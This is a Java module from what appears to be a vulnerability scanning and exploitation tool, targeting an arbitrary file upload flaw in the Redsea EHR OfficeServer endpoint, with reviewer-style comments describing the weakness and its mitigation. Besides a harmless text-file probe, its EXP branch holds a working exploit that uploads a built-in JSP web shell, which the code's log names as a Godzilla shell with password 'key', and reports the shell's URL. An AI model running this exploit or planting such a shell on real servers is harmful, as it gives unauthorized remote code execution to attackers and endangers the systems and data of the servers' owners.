package com.achuna33.Controllers;

import com.achuna33.SupportType.Poc_Exp;
import com.achuna33.SupportType.SupportVul;
import com.achuna33.Utils.HttpRequest;
import com.achuna33.Utils.Response;
import com.achuna33.Utils.Utils;
/**
 * Check module for the "红海EHR" (Redsea EHR) product; it carries a single
 * check, the OfficeServer file-upload test below.
 *
 * <p>Neither {@code @BasicMapping} nor {@code @VulnerabilityDescriptionMapping}
 * is imported on this page, so they are presumably declared in this package;
 * their exact contract is not visible here.
 *
 * <p>What a defender can observe from this code: a multipart POST to
 * {@code /RedseaPlatform/OfficeServer} carrying {@code OPTION=SAVEFILE} and a
 * client-chosen {@code FILENAME}, followed by a GET of
 * {@code /uploadfile/<random-name>.<ext>}. The server-side weakness this relies
 * on is that the extension of the stored file is taken from the client, so the
 * corresponding mitigation is an allow-list on the stored extension and not
 * serving the upload directory as executable content.
 */
@BasicMapping(uri = "红海EHR")
public class ehrController extends Controller implements BasicController{
    /**
     * Arbitrary file upload check against the Redsea EHR OfficeServer endpoint.
     *
     * <p>Both branches send the same multipart body (the {@code data} template
     * below) to {@code target + "/RedseaPlatform/OfficeServer"} and then fetch
     * {@code target + "/uploadfile/" + name} to decide whether the server stored
     * and serves the file. Results are reported only through the inherited
     * {@code WriteLog} / {@code WriteExpLog}; nothing is returned.
     *
     * @param type   selects the branch: {@code POC} uploads a random {@code .txt}
     *               containing a marker string and logs whether it is served back;
     *               {@code EXP} uploads a {@code .jsp} file and logs its URL.
     *               Any other value does nothing, because the switch has no
     *               {@code default}.
     * @param target base URL of the host under test. It is concatenated with the
     *               paths as-is, so a trailing slash would yield a {@code //}.
     * @param args   EXP branch only: {@code args[0]} is taken as a local file path
     *               whose contents replace the built-in payload. A missing,
     *               non-String or unreadable argument is swallowed and the
     *               built-in payload is used instead.
     * @throws Exception only what {@code HttpRequest} propagates; this method
     *                   throws nothing of its own.
     */
    @VulnerabilityDescriptionMapping(Description="红海EHR任意文件上传漏洞" ,SupportVulType= SupportVul.UploadFile)
    public void vul_ehr_CVM(Poc_Exp type, String target, Object... args) throws Exception {
        WriteLog("\n[*]开始检测：  红海EHR任意文件上传漏洞");
        // Multipart template shared by both branches. "shellcode" and
        // "versions.txt" are placeholder tokens; they are substituted by
        // String.replace further down. Note that "versions.txt" occurs twice
        // (the FILENAME JSON field and the part's filename attribute), so one
        // replace call rewrites both. The boundary must match the
        // Content-type header added below.
        String data = "------WebKitFormBoundaryQb1l0Fqa\r\n" +
                "Content-Disposition: form-data; name=\"OPTION\"\r\n" +
                "\r\n" +
                "{\"OPTION\":\"SAVEFILE\"}\r\n" +
                "------WebKitFormBoundaryQb1l0Fqa\r\n" +
                "Content-Disposition: form-data; name=\"FILENAME\"\r\n" +
                "\r\n" +
                "{\"FILENAME\":\"versions.txt\"}\r\n" +
                "------WebKitFormBoundaryQb1l0Fqa\r\n" +
                "Content-Disposition: form-data; name=\"file\";filename=\"versions.txt\"\r\n" +
                "\r\n" +
                "shellcode\r\n" +
                "------WebKitFormBoundaryQb1l0Fqa";
        // url2 is only referenced from commented-out code below; it is dead.
        String url2 = "/cas/js/lib/buttons/iconfig.jsp";
        // Upload endpoint used by both branches.
        String url = "/RedseaPlatform/OfficeServer";
        switch (type){
            case EXP:
                String path = null;
                String mypayload = null;
                // Optional caller-supplied payload file. The outer catch is empty,
                // so an absent args[0] or a non-String value is silently ignored
                // and mypayload stays null; only a read failure is logged.
                try {
                    path = (String) args[0];
                    try {
                        byte[] bytes = Utils.readFile(path);
                        // NOTE(review): no charset given, so this decodes with the
                        // platform default; a non-ASCII payload file may be
                        // altered on some JVMs.
                        mypayload = new String(bytes);
                    }catch (Exception e){
                        WriteExpLog("\n [*] 文件读取失败");
                    }
                }catch (Exception e){

                }
                // Built-in JSP payload used when no readable file was supplied
                // (the log line below names it as the default shell and its key).
                String payload = "<%! String xc=\"3c6e0b8a9c15224a\"; class X extends ClassLoader{public X(ClassLoader z){super(z);}public Class Q(byte[] cb){return super.defineClass(cb, 0, cb.length);} }public byte[] x(byte[] s,boolean m){ try{javax.crypto.Cipher c=javax.crypto.Cipher.getInstance(\"AES\");c.init(m?1:2,new javax.crypto.spec.SecretKeySpec(xc.getBytes(),\"AES\"));return c.doFinal(s); }catch (Exception e){return null; }}\n" +
                        "%><%try{byte[] data=new byte[Integer.parseInt(request.getHeader(\"Content-Length\"))];java.io.InputStream inputStream= request.getInputStream();int _num=0;while ((_num+=inputStream.read(data,_num,data.length))<data.length);data=x(data, false);if (session.getAttribute(\"payload\")==null){session.setAttribute(\"payload\",new X(this.getClass().getClassLoader()).Q(data));}else{request.setAttribute(\"parameters\", data);Object f=((Class)session.getAttribute(\"payload\")).newInstance();java.io.ByteArrayOutputStream arrOut=new java.io.ByteArrayOutputStream();f.equals(arrOut);f.equals(pageContext);f.toString();response.getOutputStream().write(x(arrOut.toByteArray(), true));} }catch (Exception e){}\n" +
                        "%>";

                if (mypayload!=null){
                    payload = mypayload;
                }else {
                    WriteExpLog("\n [*] 默认shell 为哥斯拉shell 密码 key");
                }
                // Random 4-character name with a .jsp extension; this is the
                // client-controlled extension the server is expected to keep.
                String expshellpath = Utils.getRandomString(4)+".jsp";
//                url = url.replace("iconfig.jsp",expshellpath);
                HttpRequest httpRequest3 = new HttpRequest(target+url);
                httpRequest3.addHeaders("User-Agent","Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.31");
                httpRequest3.addHeaders("X-Requested-With","XMLHttpRequest");
                httpRequest3.addHeaders("Accept-Encoding"," gzip, deflate");
                httpRequest3.addHeaders("Content-type","multipart/form-data; boundary=----WebKitFormBoundaryQb1l0Fqa");
                httpRequest3.addHeaders("Accept-Language"," zh-CN,zh;q=0.9");
                // NOTE(review): this Accept value has "X-Requested-With: XMLHttpRequest"
                // fused onto its end, which looks like a copy/paste slip; it is left
                // untouched here because it changes the exact bytes sent.
                httpRequest3.addHeaders("Accept"," application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequest");
                data = data.replace("shellcode",payload).replace("versions.txt",expshellpath);

                // The upload response itself is discarded; success is judged only
                // by the follow-up GET below.
                httpRequest3.Post(data);

                Response result1 = new HttpRequest(target +"/uploadfile/"+expshellpath).Get("");
                if(result1.statusCode==200){
                    WriteExpLog("\n[*] shell path:\n"+target +"/uploadfile/"+expshellpath);
                }else {
                    WriteExpLog("\n 访问失败:\n"+target +"/uploadfile/"+expshellpath);
                    WriteExpLog("\n 请验证POC 可靠性 或 EXP免杀性");

                }
                break;
            case POC:
                // Non-executable probe: a random .txt holding a fixed marker string.
                String shellpath = Utils.getRandomString(4)+".txt";
                String poc = "103ccba74d78db6awfererterter3c";
                HttpRequest httpRequest2 = new HttpRequest(target+url);
                httpRequest2.addHeaders("User-Agent","Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.31");
                httpRequest2.addHeaders("X-Requested-With","XMLHttpRequest");
                httpRequest2.addHeaders("Accept-Encoding"," gzip, deflate");
                httpRequest2.addHeaders("Content-type","multipart/form-data; boundary=----WebKitFormBoundaryQb1l0Fqa");
                httpRequest2.addHeaders("Accept-Language"," zh-CN,zh;q=0.9");
                // Same fused Accept value as in the EXP branch; kept identical.
                httpRequest2.addHeaders("Accept"," application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequest");
                httpRequest2.Post(data.replace("shellcode",poc).replace("versions.txt",shellpath));
                Response result = new HttpRequest(target+"/uploadfile/"+shellpath).Get("");
                // Vulnerable only if the marker is echoed back with HTTP 200.
                // NOTE(review): responseBody is dereferenced before statusCode is
                // checked; whether it can be null on a failed request depends on
                // HttpRequest, which is not visible here.
                if(result.responseBody.contains("103ccba74d78db6awfererterter3c")&&result.statusCode==200){
                    WriteLog("\n[*] 存在漏洞");
//                    WriteLog("访问："+target +url2.replace("iconfig.jsp",shellpath));
                }else {
                    WriteLog("\n[-] 不存在漏洞");
                }
                // No default case: any other Poc_Exp value falls through silently.
        }
    }
}
